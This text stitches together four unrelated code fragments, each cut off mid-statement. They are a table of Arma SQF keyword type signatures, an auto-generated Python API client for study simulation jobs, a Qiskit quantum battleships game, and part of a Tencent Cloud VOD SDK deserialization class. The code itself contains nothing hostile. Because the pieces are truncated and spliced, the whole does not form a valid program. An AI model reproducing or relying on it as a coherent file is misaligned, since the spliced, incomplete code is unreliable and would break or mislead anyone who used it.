BinaryExpression(Side, Keyword('getfriend'), Side, Number),
BinaryExpression(Number, Keyword('getfsmvariable'), String, Anything),
BinaryExpression(Number, Keyword('getfsmvariable'), Array, Anything),
BinaryExpression(Group, Keyword('getgroupicon'), Number, Array),
BinaryExpression(Object, Keyword('gethidefrom'), Object, Array),
BinaryExpression(Object, Keyword('gethit'), String, Number),
BinaryExpression(Object, Keyword('gethitindex'), Number, Number),
BinaryExpression(Object, Keyword('gethitpointdamage'), String, Number),
BinaryExpression(Control, Keyword('getobjectargument'), Array, String),
BinaryExpression(Control, Keyword('getobjectchildren'), String, Array),
BinaryExpression(Control, Keyword('getobjectproxy'), String, Object),
BinaryExpression(Object, Keyword('getpos'), Array, Array),
BinaryExpression(Array, Keyword('getpos'), Array, Array),
BinaryExpression(Object, Keyword('getreldir'), Object, Number),
BinaryExpression(Object, Keyword('getreldir'), Array, Number),
BinaryExpression(Object, Keyword('getrelpos'), Array, Array),
BinaryExpression(Object, Keyword('getsoundcontroller'), String, Number),
BinaryExpression(Object, Keyword('getsoundcontrollerresult'), Config, Number),
BinaryExpression(Object, Keyword('getspeed'), String, Number),
BinaryExpression(Object, Keyword('getunittrait'), String, Anything),
BinaryExpression(Display, Keyword('getvariable'), String, Anything),
BinaryExpression(Display, Keyword('getvariable'), Array, Anything),
BinaryExpression(Control, Keyword('getvariable'), String, Anything),
BinaryExpression(Control, Keyword('getvariable'), Array, Anything),
BinaryExpression(Object, Keyword('getvariable'), String, Anything),
BinaryExpression(Object, Keyword('getvariable'), Array, Anything),
BinaryExpression(Group, Keyword('getvariable'), String, Anything),
BinaryExpression(Group, Keyword('getvariable'), Array, Anything),
BinaryExpression(Namespace, Keyword('getvariable'), String, Anything),
BinaryExpression(Namespace, Keyword('getvariable'), Array, Anything),
BinaryExpression(TeamMember, Keyword('getvariable'), String, Anything),
BinaryExpression(TeamMember, Keyword('getvariable'), Array, Anything),
BinaryExpression(Task, Keyword('getvariable'), String, Anything),
BinaryExpression(Task, Keyword('getvariable'), Array, Anything),
BinaryExpression(Location, Keyword('getvariable'), String, Anything),
BinaryExpression(Location, Keyword('getvariable'), Array, Anything),
BinaryExpression(Object, Keyword('glanceat'), Object, Nothing),
BinaryExpression(Object, Keyword('glanceat'), Array, Nothing),
BinaryExpression(Array, Keyword('glanceat'), Object, Nothing),
BinaryExpression(Array, Keyword('glanceat'), Array, Nothing),
BinaryExpression(Object, Keyword('globalchat'), String, Nothing),
BinaryExpression(Object, Keyword('globalradio'), String, Nothing),
BinaryExpression(Object, Keyword('groupchat'), String, Nothing),
BinaryExpression(Object, Keyword('groupradio'), String, Nothing),
BinaryExpression(Object, Keyword('groupselectunit'), Array, Nothing),
BinaryExpression(Object, Keyword('hasweapon'), String, Boolean),
BinaryExpression(Object, Keyword('hcgroupparams'), Group, Array),
BinaryExpression(Object, Keyword('hcremovegroup'), Group, Nothing),
BinaryExpression(Object, Keyword('hcselectgroup'), Array, Nothing),
BinaryExpression(Object, Keyword('hcsetgroup'), Array, Nothing),
BinaryExpression(Object, Keyword('hideobject'), Boolean, Nothing),
BinaryExpression(Object, Keyword('hideobjectglobal'), Boolean, Nothing),
BinaryExpression(Object, Keyword('hideselection'), Array, Nothing),
BinaryExpression(String, Keyword('hintc'), String, Nothing),
BinaryExpression(String, Keyword('hintc'), String, Nothing),
BinaryExpression(String, Keyword('hintc'), Array, Nothing),
BinaryExpression(Control, Keyword('htmlload'), String, Nothing),
BinaryExpression(Type, Keyword('in'), Array, Boolean),
BinaryExpression(Object, Keyword('in'), Object, Boolean),
BinaryExpression(Array, Keyword('in'), Location, Boolean),
BinaryExpression(Object, Keyword('inarea'), Object, Boolean),
BinaryExpression(Array, Keyword('inarea'), Object, Boolean),
BinaryExpression(Object, Keyword('inarea'), String, Boolean),
BinaryExpression(Array, Keyword('inarea'), String, Boolean),
BinaryExpression(Object, Keyword('inarea'), Array, Boolean),
BinaryExpression(Array, Keyword('inarea'), Array, Boolean),
BinaryExpression(Object, Keyword('inarea'), Location, Boolean),
BinaryExpression(Array, Keyword('inarea'), Location, Boolean),
BinaryExpression(Array, Keyword('inareaarray'), Object, Array),
BinaryExpression(Array, Keyword('inareaarray'), String, Array),
BinaryExpression(Array, Keyword('inareaarray'), Array, Array),
BinaryExpression(Array, Keyword('inareaarray'), Location, Array),
BinaryExpression(Object, Keyword('inflame'), Boolean, Nothing),
BinaryExpression(Object, Keyword('infopanelcomponentenabled'), Array, Boolean),
BinaryExpression(Array, Keyword('infopanelcomponentenabled'), Array, Boolean),
BinaryExpression(Object, Keyword('infopanelcomponents'), String, Array),
BinaryExpression(Array, Keyword('infopanelcomponents'), String, Array),
BinaryExpression(Array, Keyword('inpolygon'), Array, Boolean),
BinaryExpression(Array, Keyword('inrangeofartillery'), Array, Boolean),
BinaryExpression(Control, Keyword('inserteditorobject'), Array, String),
BinaryExpression(Array, Keyword('intersect'), Array, Array),
BinaryExpression(Type, Keyword('isequalto'), Type, Boolean),
BinaryExpression(Type, Keyword('isequaltype'), Type, Boolean),
BinaryExpression(Array, Keyword('isequaltypeall'), Type, Boolean),
BinaryExpression(Type, Keyword('isequaltypeany'), Array, Boolean),
BinaryExpression(Array, Keyword('isequaltypearray'), Array, Boolean),
BinaryExpression(Type, Keyword('isequaltypeparams'), Array, Boolean),
BinaryExpression(Object, Keyword('isflashlighton'), String, Boolean),
BinaryExpression(Array, Keyword('isflatempty'), Array, Array),
BinaryExpression(Object, Keyword('isirlaseron'), String, Boolean),
BinaryExpression(String, Keyword('iskindof'), String, Boolean),
BinaryExpression(String, Keyword('iskindof'), Array, Boolean),
BinaryExpression(Object, Keyword('iskindof'), String, Boolean),
BinaryExpression(Object, Keyword('issensortargetconfirmed'), Side, Boolean),
BinaryExpression(Object, Keyword('isuavconnectable'), Array, Boolean),
BinaryExpression(Object, Keyword('isuniformallowed'), String, Boolean),
BinaryExpression(Object, Keyword('isvehiclesensorenabled'), String, Array),
BinaryExpression(Array, Keyword('join'), Object, Nothing),
BinaryExpression(Array, Keyword('join'), Group, Nothing),
BinaryExpression(Object, Keyword('joinas'), Array, Nothing),
BinaryExpression(Object, Keyword('joinassilent'), Array, Nothing),
BinaryExpression(Array, Keyword('joinsilent'), Object, Nothing),
BinaryExpression(Array, Keyword('joinsilent'), Group, Nothing),
BinaryExpression(Array, Keyword('joinstring'), String, String),
BinaryExpression(Object, Keyword('kbadddatabase'), String, Boolean),
BinaryExpression(Object, Keyword('kbadddatabasetargets'), String, Boolean),
BinaryExpression(Object, Keyword('kbaddtopic'), Array, Nothing),
BinaryExpression(Object, Keyword('kbhastopic'), String, Boolean),
BinaryExpression(Object, Keyword('kbreact'), Array, Nothing),
BinaryExpression(Object, Keyword('kbremovetopic'), String, Nothing),
BinaryExpression(Object, Keyword('kbtell'), Array, Nothing),
BinaryExpression(Object, Keyword('kbwassaid'), Array, Boolean),
BinaryExpression(Object, Keyword('knowsabout'), Object, Number),
BinaryExpression(Group, Keyword('knowsabout'), Object, Number),
BinaryExpression(Side, Keyword('knowsabout'), Object, Number),
BinaryExpression(Object, Keyword('land'), String, Nothing),
BinaryExpression(Object, Keyword('landat'), Object, Nothing),
BinaryExpression(Object, Keyword('landat'), Number, Nothing),
BinaryExpression(Control, Keyword('lbadd'), String, Number),
BinaryExpression(Control, Keyword('lbcolor'), Number, Array),
BinaryExpression(Control, Keyword('lbcolorright'), Number, Array),
BinaryExpression(Control, Keyword('lbdata'), Number, String),
BinaryExpression(Control, Keyword('lbdelete'), Number, Nothing),
BinaryExpression(Control, Keyword('lbisselected'), Number, Boolean),
BinaryExpression(Control, Keyword('lbpicture'), Number, String),
BinaryExpression(Control, Keyword('lbpictureright'), Number, String),
BinaryExpression(Control, Keyword('lbsetcolor'), Array, Nothing),
BinaryExpression(Control, Keyword('lbsetcolorright'), Array, Nothing),
BinaryExpression(Control, Keyword('lbsetcursel'), Number, Nothing),
BinaryExpression(Control, Keyword('lbsetdata'), Array, Nothing),
BinaryExpression(Control, Keyword('lbsetpicture'), Array, Nothing),
BinaryExpression(Control, Keyword('lbsetpicturecolor'), Array, Nothing),
BinaryExpression(Control, Keyword('lbsetpicturecolordisabled'), Array, Nothing),
BinaryExpression(Control, Keyword('lbsetpicturecolorselected'), Array, Nothing),
BinaryExpression(Control, Keyword('lbsetpictureright'), Array, Nothing),
BinaryExpression(Control, Keyword('lbsetpicturerightcolor'), Array, Nothing),
BinaryExpression(Control, Keyword('lbsetpicturerightcolordisabled'), Array, Nothing),
BinaryExpression(Control, Keyword('lbsetpicturerightcolorselected'), Array, Nothing),
BinaryExpression(Control, Keyword('lbsetselectcolor'), Array, Nothing),
BinaryExpression(Control, Keyword('lbsetselectcolorright'), Array, Nothing),
BinaryExpression(Control, Keyword('lbsetselected'), Array, Nothing),
BinaryExpression(Control, Keyword('lbsettext'), Array, Nothing),
BinaryExpression(Control, Keyword('lbsettextright'), Array, Nothing),
BinaryExpression(Control, Keyword('lbsettooltip'), Array, Nothing),
BinaryExpression(Control, Keyword('lbsetvalue'), Array, Nothing),
BinaryExpression(Control, Keyword('lbtext'), Number, String),
BinaryExpression(Control, Keyword('lbtextright'), Number, String),
BinaryExpression(Control, Keyword('lbvalue'), Number, Number),
BinaryExpression(Object, Keyword('leavevehicle'), Object, Nothing),
BinaryExpression(Group, Keyword('leavevehicle'), Object, Nothing),
BinaryExpression(Object, Keyword('lightattachobject'), Array, Nothing),
BinaryExpression(Object, Keyword('limitspeed'), Number, Nothing),
BinaryExpression(Object, Keyword('linkitem'), String, Nothing),
BinaryExpression(Control, Keyword('listobjects'), String, Array),
BinaryExpression(Control, Keyword('lnbaddcolumn'), Number, Number),
BinaryExpression(Control, Keyword('lnbaddrow'), Array, Number),
BinaryExpression(Control, Keyword('lnbcolor'), Array, Array),
BinaryExpression(Control, Keyword('lnbcolorright'), Array, | |
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.study_get_study_job_deprecated_with_http_info(tenant_id, user_id, study_id, job_id, **kwargs) # noqa: E501
def study_get_study_job_deprecated_with_http_info(self, tenant_id, user_id, study_id, job_id, **kwargs): # noqa: E501
"""study_get_study_job_deprecated # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.study_get_study_job_deprecated_with_http_info(tenant_id, user_id, study_id, job_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str tenant_id: (required)
:param str user_id: (required)
:param str study_id: (required)
:param str job_id: (required)
:param str sim_version:
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(GetStudyJobQueryResult, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'tenant_id',
'user_id',
'study_id',
'job_id',
'sim_version'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method study_get_study_job_deprecated" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'tenant_id' is set
if self.api_client.client_side_validation and ('tenant_id' not in local_var_params or # noqa: E501
local_var_params['tenant_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `tenant_id` when calling `study_get_study_job_deprecated`") # noqa: E501
# verify the required parameter 'user_id' is set
if self.api_client.client_side_validation and ('user_id' not in local_var_params or # noqa: E501
local_var_params['user_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `user_id` when calling `study_get_study_job_deprecated`") # noqa: E501
# verify the required parameter 'study_id' is set
if self.api_client.client_side_validation and ('study_id' not in local_var_params or # noqa: E501
local_var_params['study_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `study_id` when calling `study_get_study_job_deprecated`") # noqa: E501
# verify the required parameter 'job_id' is set
if self.api_client.client_side_validation and ('job_id' not in local_var_params or # noqa: E501
local_var_params['job_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `job_id` when calling `study_get_study_job_deprecated`") # noqa: E501
collection_formats = {}
path_params = {}
if 'tenant_id' in local_var_params:
path_params['tenantId'] = local_var_params['tenant_id'] # noqa: E501
if 'user_id' in local_var_params:
path_params['userId'] = local_var_params['user_id'] # noqa: E501
if 'study_id' in local_var_params:
path_params['studyId'] = local_var_params['study_id'] # noqa: E501
if 'job_id' in local_var_params:
path_params['jobId'] = local_var_params['job_id'] # noqa: E501
query_params = []
if 'sim_version' in local_var_params and local_var_params['sim_version'] is not None: # noqa: E501
query_params.append(('simVersion', local_var_params['sim_version'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'text/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/studies/{tenantId}/{userId}/{studyId}/jobs/{jobId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetStudyJobQueryResult', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def study_get_study_job_download(self, tenant_id, study_id, job_id, access_signature, expiry, **kwargs): # noqa: E501
"""study_get_study_job_download # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.study_get_study_job_download(tenant_id, study_id, job_id, access_signature, expiry, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str tenant_id: (required)
:param str study_id: (required)
:param str job_id: (required)
:param str access_signature: (required)
:param str expiry: (required)
:param str file_name:
:param bool channels_as_csv:
:param str sim_type_channels:
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.study_get_study_job_download_with_http_info(tenant_id, study_id, job_id, access_signature, expiry, **kwargs) # noqa: E501
def study_get_study_job_download_with_http_info(self, tenant_id, study_id, job_id, access_signature, expiry, **kwargs): # noqa: E501
"""study_get_study_job_download # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.study_get_study_job_download_with_http_info(tenant_id, study_id, job_id, access_signature, expiry, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str tenant_id: (required)
:param str study_id: (required)
:param str job_id: (required)
:param str access_signature: (required)
:param str expiry: (required)
:param str file_name:
:param bool channels_as_csv:
:param str sim_type_channels:
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(object, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'tenant_id',
'study_id',
'job_id',
'access_signature',
'expiry',
'file_name',
'channels_as_csv',
'sim_type_channels'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method study_get_study_job_download" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'tenant_id' is set
if self.api_client.client_side_validation and ('tenant_id' not in local_var_params or # noqa: E501
local_var_params['tenant_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `tenant_id` when calling `study_get_study_job_download`") # noqa: E501
# verify the required parameter 'study_id' is set
if self.api_client.client_side_validation and ('study_id' not in local_var_params or # noqa: E501
local_var_params['study_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `study_id` when calling `study_get_study_job_download`") # noqa: E501
# verify the required parameter 'job_id' is set
if self.api_client.client_side_validation and ('job_id' not in local_var_params or # noqa: E501
local_var_params['job_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `job_id` when calling `study_get_study_job_download`") # noqa: E501
# verify the required parameter 'access_signature' is set
if self.api_client.client_side_validation and ('access_signature' not in local_var_params or # noqa: E501
local_var_params['access_signature'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `access_signature` when calling `study_get_study_job_download`") # noqa: E501
# verify the required parameter 'expiry' is set
if self.api_client.client_side_validation and ('expiry' not in local_var_params or # noqa: E501
local_var_params['expiry'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `expiry` when calling `study_get_study_job_download`") # noqa: E501
collection_formats = {}
path_params = {}
if 'tenant_id' in local_var_params:
path_params['tenantId'] = local_var_params['tenant_id'] # noqa: E501
if 'study_id' in local_var_params:
path_params['studyId'] = local_var_params['study_id'] # noqa: E501
if 'job_id' in local_var_params:
path_params['jobId'] = local_var_params['job_id'] # noqa: E501
query_params = []
if 'access_signature' in local_var_params and local_var_params['access_signature'] is not None: # noqa: E501
query_params.append(('accessSignature', local_var_params['access_signature'])) # noqa: E501
if 'expiry' in local_var_params and local_var_params['expiry'] is not None: # noqa: E501
query_params.append(('expiry', local_var_params['expiry'])) # noqa: E501
if 'file_name' in local_var_params and local_var_params['file_name'] is not None: # noqa: E501
query_params.append(('fileName', local_var_params['file_name'])) # noqa: E501
if 'channels_as_csv' in local_var_params and local_var_params['channels_as_csv'] is not None: # noqa: E501
query_params.append(('channelsAsCsv', local_var_params['channels_as_csv'])) # noqa: E501
if 'sim_type_channels' in local_var_params and local_var_params['sim_type_channels'] is not None: # noqa: E501
query_params.append(('simTypeChannels', local_var_params['sim_type_channels'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'text/json', 'application/xml', 'text/xml']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/studies/{tenantId}/{studyId}/jobs/{jobId}/download', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def study_get_study_job_download_deprecated(self, tenant_id, user_id, study_id, job_id, access_signature, expiry, **kwargs): # noqa: E501
"""study_get_study_job_download_deprecated # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.study_get_study_job_download_deprecated(tenant_id, user_id, study_id, job_id, access_signature, expiry, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str tenant_id: (required)
:param str user_id: (required)
:param str study_id: (required)
:param str job_id: (required)
:param str access_signature: | |
from qiskit import Aer, IBMQ, QuantumRegister, ClassicalRegister, QuantumCircuit, execute
import getpass, random, numpy, math
def title_screen ():
print("\n\n\n\n\n\n\n\n")
print(" ██████╗ ██╗ ██╗ █████╗ ███╗ ██╗████████╗██╗ ██╗███╗ ███╗ ")
print(" ██╔═══██╗██║ ██║██╔══██╗████╗ ██║╚══██╔══╝██║ ██║████╗ ████║ ")
print(" ██║ ██║██║ ██║███████║██╔██╗ ██║ ██║ ██║ ██║██╔████╔██║ ")
print(" ██║▄▄ ██║██║ ██║██╔══██║██║╚██╗██║ ██║ ██║ ██║██║╚██╔╝██║ ")
print(" ╚██████╔╝╚██████╔╝██║ ██║██║ ╚████║ ██║ ╚██████╔╝██║ ╚═╝ ██║ ")
print(" ╚══▀▀═╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═══╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝ ")
print("")
print(" ██████╗ █████╗ ████████╗████████╗██╗ ███████╗███████╗██╗ ██╗██╗██████╗ ███████╗")
print(" ██╔══██╗██╔══██╗╚══██╔══╝╚══██╔══╝██║ ██╔════╝██╔════╝██║ ██║██║██╔══██╗██╔════╝")
print(" ██████╔╝███████║ ██║ ██║ ██║ █████╗ ███████╗███████║██║██████╔╝███████╗")
print(" ██╔══██╗██╔══██║ ██║ ██║ ██║ ██╔══╝ ╚════██║██╔══██║██║██╔═══╝ ╚════██║")
print(" ██████╔╝██║ ██║ ██║ ██║ ███████╗███████╗███████║██║ ██║██║██║ ███████║")
print(" ╚═════╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚══════╝╚══════╝╚══════╝╚═╝ ╚═╝╚═╝╚═╝ ╚══════╝")
print("")
print(" ___ ___ _ _ ")
print(r' | _ ) _ _ | \ ___ __ ___ __| | ___ | |__ _ _ ')
print(r' | _ \| || | | |) |/ -_)/ _|/ _ \/ _` |/ _ \| / /| || |')
print(r' |___/ \_, | |___/ \___|\__|\___/\__,_|\___/|_\_\ \_,_|')
print(" |__/ ")
print("")
print(" A game played on a real quantum computer!")
print("")
print("")
input("> Press Enter to play...\n").upper()
def play_game():
# the game variable will be set to False once the game is over
game = True
# the variable bombs[X][Y] will hold the number of times position Y has been bombed by player X+1
bomb = [[0]*5 for _ in range(2)] # all values are initialized to zero
# set the number of samples used for statistics
shots = 1024
# the variable grid[player] will hold the results for the grid of each player
grid = [{}, {}]
# ask what kind of quantum device will be used (real or simulated)
device = ask_for_device()
# ask players where thir ships are
shipPos = ask_for_ships()
while (game):
# ask both players where they want to bomb, and update the list of bombings so far
bomb = ask_for_bombs(bomb)
# now we create and run the quantum programs that implement this on the grid for each player
qc = []
for player in range(2):
# now to set up the quantum program to simulate the grid for this player
# set up registers and program
q = QuantumRegister(5)
c = ClassicalRegister(5)
qc.append(QuantumCircuit(q, c))
# add the bombs (of the opposing player)
for position in range(5):
# add as many bombs as have been placed at this position
for _ in range(bomb[(player+1)%2][position]):
# the effectiveness of the bomb
# (which means the quantum operation we apply)
# depends on which ship it is
for ship in [0,1,2]:
if (position == shipPos[player][ship]):
frac = 1/(ship+1)
# add this fraction of a NOT to the QASM
qc[player].u3(frac * math.pi, 0.0, 0.0, q[position])
# Finally, measure them
for position in range(5):
qc[player].measure(q[position], c[position])
# compile and run the quantum program
job = execute(qc, backend=device, shots=shots)
if not device.configuration().to_dict()['simulator']:
print("\nWe've now submitted the job to the quantum computer to see what happens to the ships of each player\n(it might take a while).\n")
else:
print("\nWe've now submitted the job to the simulator to see what happens to the ships of each player.\n")
# and extract data
for player in range(2):
grid[player] = job.result().get_counts(qc[player])
print(grid)
game = display_grid(grid, shipPos, shots)
def ask_for_device ():
d = input("Do you want to play on the real device? (y/n)\n").upper()
if (d=="Y"):
device = IBMQ.get_backend('ibmq_5_tenerife') # if real, we use ibmqx4
else:
device = Aer.get_backend('qasm_simulator') # otherwise, we use a simulator
return device
def ask_for_ships ():
# we'll start with a 'press enter to continue' type command. But it hides a secret! If you input 'R', the positions will be chosen randomly
randPlace = input("> Press Enter to start placing ships...\n").upper()
# The variable ship[X][Y] will hold the position of the Yth ship of player X+1
shipPos = [ [-1]*3 for _ in range(2)] # all values are initialized to the impossible position -1|
# loop over both players and all three ships for each
for player in [0,1]:
# if we chose to bypass player choice and do random, we do that
if randPlace=="R":
randPos = random.sample(range(5), 3)
for ship in [0,1,2]:
shipPos[player][ship] = randPos[ship]
#print(randPos) #uncomment if you want a sneaky peek at where the ships are
else:
for ship in [0,1,2]:
# ask for a position for each ship, and keep asking until a valid answer is given
choosing = True
while (choosing):
# get player input
position = getpass.getpass("Player " + str(player+1) + ", choose a position for ship " + str(ship+1) + " (0, 1, 2, 3 or 4)\n" )
# see if the input is valid and ask for another if not
if position.isdigit(): # valid answers have to be integers
position = int(position)
if (position in [0,1,2,3,4]) and (not position in shipPos[player]): # they need to be between 0 and 5, and not used for another ship of the same player
shipPos[player][ship] = position
choosing = False
print ("\n")
elif position in shipPos[player]:
print("\nYou already have a ship there. Try again.\n")
else:
print("\nThat's not a valid position. Try again.\n")
else:
print("\nThat's not a valid position. Try again.\n")
return shipPos
def ask_for_bombs ( bomb ):
input("> Press Enter to place some bombs...\n")
# ask both players where they want to bomb
for player in range(2):
print("\n\nIt's now Player " + str(player+1) + "'s turn.\n")
# keep asking until a valid answer is given
choosing = True
while (choosing):
# get player input
position = input("Choose a position to bomb (0, 1, 2, 3 or 4)\n")
# see if this is a valid input. ask for another if not
if position.isdigit(): # valid answers have to be integers
position = int(position)
if position in range(5): # they need to be between 0 and 5, and not used for another ship of the same player
bomb[player][position] = bomb[player][position] + 1
choosing = False
print ("\n")
else:
print("\nThat's not a valid position. Try again.\n")
else:
print("\nThat's not a valid position. Try again.\n")
return bomb
def display_grid ( grid, shipPos, shots ):
# since this function has been called, the game must still be on
game = True
# look at the damage on all qubits (we'll even do ones with no ships)
damage = [ [0]*5 for _ in range(2)] # this will hold the prob of a 1 for each qubit for each player
# for this we loop over all strings of 5 bits for each player
for player in range(2):
for bitString in grid[player].keys():
# and then over all positions
for position in range(5):
# if the string has a 1 at that position, we add a contribution to the damage
# remember that the bit for position 0 is the rightmost one, and so at bitString[4]
if (bitString[4-position]=="1"):
damage[player][position] += grid[player][bitString]/shots
# give results to players
for player in [0,1]:
input("\nPress Enter to see the results for Player " + str(player+1) + "'s ships...\n")
# report damage for qubits that are ships, and which have significant damage
# ideally this would be non-zero damage, but noise means it can happen for ships that haven't been hit
# so we choose 5% as the threshold
display = [" ? "]*5
# loop over all qubits that are ships
for position in shipPos[player]:
# if the damage is high enough, display the damage
if ( damage[player][position] > 0.1 ):
if (damage[player][position]>0.9):
display[position] = "100%"
else:
display[position] = str(int( 100*damage[player][position] )) + "% "
#print(position,damage[player][position])
print("Here is the percentage damage for ships that have been bombed.\n")
print(display[ 4 ] + " " + display[ 0 ])
print(r' |\ /|')
print(r' | \ / |')
print(r' | \ / |')
print(" | " + display[ 2 ] + " |")
print(r' | | |
= None
self.ConcatCompleteEvent = None
self.SnapshotByTimeOffsetCompleteEvent = None
self.WechatPublishCompleteEvent = None
self.WechatMiniProgramPublishCompleteEvent = None
def _deserialize(self, params):
self.EventHandle = params.get("EventHandle")
self.EventType = params.get("EventType")
if params.get("FileUploadEvent") is not None:
self.FileUploadEvent = FileUploadTask()
self.FileUploadEvent._deserialize(params.get("FileUploadEvent"))
if params.get("ProcedureStateChangeEvent") is not None:
self.ProcedureStateChangeEvent = ProcedureTask()
self.ProcedureStateChangeEvent._deserialize(params.get("ProcedureStateChangeEvent"))
if params.get("FileDeleteEvent") is not None:
self.FileDeleteEvent = FileDeleteTask()
self.FileDeleteEvent._deserialize(params.get("FileDeleteEvent"))
if params.get("PullCompleteEvent") is not None:
self.PullCompleteEvent = PullUploadTask()
self.PullCompleteEvent._deserialize(params.get("PullCompleteEvent"))
if params.get("EditMediaCompleteEvent") is not None:
self.EditMediaCompleteEvent = EditMediaTask()
self.EditMediaCompleteEvent._deserialize(params.get("EditMediaCompleteEvent"))
if params.get("SplitMediaCompleteEvent") is not None:
self.SplitMediaCompleteEvent = SplitMediaTask()
self.SplitMediaCompleteEvent._deserialize(params.get("SplitMediaCompleteEvent"))
if params.get("ComposeMediaCompleteEvent") is not None:
self.ComposeMediaCompleteEvent = ComposeMediaTask()
self.ComposeMediaCompleteEvent._deserialize(params.get("ComposeMediaCompleteEvent"))
if params.get("ClipCompleteEvent") is not None:
self.ClipCompleteEvent = ClipTask2017()
self.ClipCompleteEvent._deserialize(params.get("ClipCompleteEvent"))
if params.get("TranscodeCompleteEvent") is not None:
self.TranscodeCompleteEvent = TranscodeTask2017()
self.TranscodeCompleteEvent._deserialize(params.get("TranscodeCompleteEvent"))
if params.get("CreateImageSpriteCompleteEvent") is not None:
self.CreateImageSpriteCompleteEvent = CreateImageSpriteTask2017()
self.CreateImageSpriteCompleteEvent._deserialize(params.get("CreateImageSpriteCompleteEvent"))
if params.get("ConcatCompleteEvent") is not None:
self.ConcatCompleteEvent = ConcatTask2017()
self.ConcatCompleteEvent._deserialize(params.get("ConcatCompleteEvent"))
if params.get("SnapshotByTimeOffsetCompleteEvent") is not None:
self.SnapshotByTimeOffsetCompleteEvent = SnapshotByTimeOffsetTask2017()
self.SnapshotByTimeOffsetCompleteEvent._deserialize(params.get("SnapshotByTimeOffsetCompleteEvent"))
if params.get("WechatPublishCompleteEvent") is not None:
self.WechatPublishCompleteEvent = WechatPublishTask()
self.WechatPublishCompleteEvent._deserialize(params.get("WechatPublishCompleteEvent"))
if params.get("WechatMiniProgramPublishCompleteEvent") is not None:
self.WechatMiniProgramPublishCompleteEvent = WechatMiniProgramPublishTask()
self.WechatMiniProgramPublishCompleteEvent._deserialize(params.get("WechatMiniProgramPublishCompleteEvent"))
memeber_set = set(params.keys())
for name, value in vars(self).items():
if name in memeber_set:
memeber_set.remove(name)
if len(memeber_set) > 0:
warnings.warn("%s fileds are useless." % ",".join(memeber_set))
class ExecuteFunctionRequest(AbstractModel):
"""ExecuteFunction请求参数结构体
"""
def __init__(self):
"""
:param FunctionName: 调用后端接口名称。
:type FunctionName: str
:param FunctionArg: 接口参数,具体参数格式调用时与后端协调。
:type FunctionArg: str
